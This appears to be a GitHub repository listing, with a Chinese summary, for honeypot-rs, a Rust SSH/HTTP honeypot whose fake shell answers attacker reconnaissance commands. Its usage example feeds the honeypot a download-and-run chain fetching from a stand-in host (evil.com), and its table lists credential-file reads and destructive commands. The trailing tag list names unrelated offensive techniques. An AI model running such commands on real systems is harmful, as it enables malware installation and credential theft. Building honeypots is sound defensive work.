InnerWarden/honeypot-rs

GitHub: InnerWarden/honeypot-rs

用 Rust 编写的轻量 SSH/HTTP 蜜罐,内置确定性伪装 Shell,可在无 AI 依赖的情况下即时模拟真实系统响应,帮助安全团队以极低代价捕获攻击行为。

Stars: 0 | Forks: 0

# honeypot-rs **轻量级 SSH/HTTP 蜜罐,采用 Rust 编写并带有伪装 Shell。** 捕获攻击者行为,对真实系统零风险。 ## 伪装 Shell honeypot-rs 的核心是一个确定性的伪装 Shell,可即时响应 40 多种常见的侦察命令——无需 AI,无需 LLM,无延迟。 ``` use honeypot_rs::fake_shell::FakeShell; let shell = FakeShell::new("prod-web-03", "root"); assert_eq!(shell.execute("whoami"), Some("root".into())); assert_eq!(shell.execute("hostname"), Some("prod-web-03".into())); // Attackers see realistic output let ps = shell.execute("ps aux").unwrap(); assert!(ps.contains("sshd")); assert!(ps.contains("nginx")); // Dangerous commands silently "succeed" (nothing happens) shell.execute("wget http://evil.com/malware -O /tmp/x"); shell.execute("chmod +x /tmp/x && /tmp/x"); // Unknown commands get realistic error let resp = shell.execute("nmap 10.0.0.0/24").unwrap(); assert!(resp.contains("command not found")); ``` ## 支持的命令 | 类别 | 命令 | |----------|----------| | 身份 | `whoami`, `id`, `hostname`, `uname -a`, `uptime`, `w` | | 系统 | `cat /etc/os-release`, `cat /etc/passwd`, `free -h`, `df -h` | | 网络 | `ifconfig`, `ip addr`, `netstat -tlnp`, `ss -tlnp` | | 进程 | `ps aux`, `ps -ef` | | 文件系统 | `ls`, `ls -la`, `pwd`, `cat /etc/shadow` (拒绝访问) | | 安全 | `iptables -L`, `crontab -l`, `env`, `which curl/wget/python` | | 透传 | `echo *`, `cd *`, `exit` | | 危险 | `rm`, `wget`, `curl`, `chmod`, `chown` (静默空操作) | ## 安装 ``` [dependencies] honeypot-rs = { git = "https://github.com/InnerWarden/honeypot-rs" } ``` [InnerWarden](https://innerwarden.com) 安全生态系统的一部分。
标签:ADCS攻击, BOF, Cobalt Strike, Fake Shell, HTTP蜜罐, InnerWarden, IP 地址批量处理, LangChain, Rust, SSH蜜罐, 内存分配, 可视化界面, 命令模拟, 威胁情报, 开发库, 开发者工具, 开源, 攻击诱捕, 模拟终端, 欺骗防御, 网络安全, 网络流量审计, 蜜罐, 行为捕获, 证书利用, 轻量级, 进程注入, 隐私保护